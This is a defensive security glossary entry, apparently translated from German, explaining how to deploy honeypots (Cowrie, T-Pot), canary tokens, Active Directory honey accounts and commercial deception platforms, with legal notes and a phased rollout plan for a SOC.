Detection & Response Glossary
Honeypot und Deception Technology - Angreifer friuehzeitig entlarven
A practical guide to implementing deception infrastructure: honeypots (Cowrie, T-Pot) for network detection, canary tokens for files and AD credentials, and commercial platforms (Attivo, Illusive). This guide supplements the basic entry on honeypots and the conceptual entry on deception technology with concrete deployment instructions.
Honeypots have the highest signal-to-noise ratio of any security tool: every attempt to access a honeypot is a genuine attack. There are no false positives—legitimate users never interact with honeypots.
Honeypot Types and Deployment
Classification by interaction level:
Low-Interaction Honeypots:
→ Emulate specific services (SSH, HTTP, SMB)
→ Collect: login attempts, exploits used, attacker IPs
→ Risk: low (no real shell)
→ Tools: Honeyd, Dionaea, Glastopf
Deployment:
→ Internet-facing: collect attacker IPs, exploit attempts
→ Internal: detects network scans (who is scanning the honeypot?)
High-Interaction Honeypots:
→ Full-fledged system (physical or VM)
→ Attacker can actually log in, execute code
→ Collects: attacker’s complete TTPs
→ Risk: attacker could pivot → Isolation required!
Use:
→ Security research
→ TTP collection for threat intelligence
→ Deploy with extreme caution!
Cowrie (SSH/Telnet honeypot):
# Docker:
docker run -p 22:2222/tcp -p 23:2223/tcp cowrie/cowrie
# What Cowrie records:
→ Login attempts (username + password)
→ SSH key fingerprints
→ Executed commands (in fake shell)
→ Download attempts
→ Lateral movement attempts
T-Pot (Multi-Honeypot Platform):
→ 20+ honeypots in one (Cowrie, Dionaea, Elasticpot, etc.)
→ ELK Stack: Visualization of all attacks
→ Threat Map: Where do attacks come from?Canary Tokens: Deception in the Corporate Network
Canary Tokens - the simplest deception measure:
Concept: Distribute tokens/traps everywhere
→ No attacker knows: what is real, what is a trap?
→ Cost: almost zero (many are free!)
→ Signal: 100% false-positive-free (never triggered!)
Canary Token Types (canarytokens.org - free!):
Web Token (HTTP):
→ Fake URL in document: when accessed → Alert
→ In email inbox, Word documents, presentations
→ "ContractTemplate.docx" contains token → opened by AMS.exe?
DNS Tokens:
→ Fake domain: lookup = Alert
→ Stored in password manager (as "backup server")
→ If attacker copies password manager and connects → ALERT!
Cloned Website Tokens:
→ Clone of login page (fake)
→ Attacker sees login page → enters credentials → Alert!
AWS Keys (Fake):
→ Fake AWS Access Key in code or config
→ Any API request using these keys → immediate alert
→ Where was the key stored? Compromised!
SQL Server Token:
→ Fake DB query when executed → Alert
→ In production DB as table/view "customer_exports"
Active Directory Honey Credentials:
→ Fake AD account: looks legitimate, never used
→ Every login attempt = Indicator of Compromise!
# PowerShell: Create honey account:
New-ADUser -Name "svc-backup-old" `
-Description "Legacy Backup Service Account" `
-AccountPassword (ConvertTo-SecureString "..." -AsPlainText -Force) `
-Enabled $true `
-PasswordNeverExpires $true
# Alert: every authentication of this account → SOC alert (P1!)
Honey File on File Server:
"Confidential - Salaries_All_Employees_2026.xlsx"
→ Canarytokens Macro: if opened → Alert
→ Every time this file is opened = Indicator of an insider threat!Deception Technology: Enterprise Solutions
Modern Deception Platforms:
Attivo Networks (SentinelOne ThreatDefend):
→ Automatic honeypot deployment across the network
→ Dynamic Deception: Honeypots look like real systems
→ AD Deception: Fake AD objects (users, GPOs, computers)
→ Integration: SIEM, SOAR (automatic isolation upon contact)
Illusive Networks (Proofpoint):
→ Focus: Detecting lateral movement
→ Fake credentials in memory (like real tokens)
→ When attackers steal and use credentials → Alert!
→ Zero false positives (conceptual advantage)
Canarytokens.org (free):
→ 20+ token types
→ No installation required
→ Ideal for: SMEs, first steps in deception
→ Limitation: no centralized management
Custom honeypot stack:
T-Pot + Canarytokens + AD honey accounts:
→ Costs: Hardware/VM + time
→ For: Tech companies, security teams
Legal aspects:
→ Honeypots: permitted in Germany (own network)
→ Collecting attacker data: non-critical within own network
→ NO "hacking back" (illegal!)
→ Data protection: IP addresses are personal data → 72h max? Or legitimate interest
→ Works council: for internal deployment → Works agreementImplementing honey infrastructure
Step-by-step deception deployment:
Minimal setup (Day 1, free):
1. Visit canarytokens.org
2. Create HTTP token → embed in document
3. Create DNS token → add to password manager
4. AWS fake key → place in test repository (public!)
5. Configure email address for alerts
AD Honey Accounts (Week 1):
→ 3–5 fake accounts in different OUs
→ Names: sound legitimate (svc-backup, it-admin-old, etc.)
→ Event 4624 (Login Success): Immediate P1 alert!
→ Event 4625 (login failure): Alert (someone is trying)
Network honeypots (Month 1):
→ VM in every VLAN: listens for SSH, RDP, HTTP
→ Alert on connection attempt (no one should connect!)
→ T-Pot: collect all attack data centrally
Honey File Strategy:
→ 10 enticing file names (salaries, passwords, backups)
→ Canarytokens macro embedded
→ On file server: in folders that insiders can see
→ Normal user: NEVER needs these files
→ Insider/attacker: opens interesting files
Integration into SOC workflow:
→ All CanaryToken alerts → directly assigned "high priority" in SIEM
→ Playbook: CanaryToken triggered → immediate endpoint isolation
→ Post-incident: which other systems were affected?
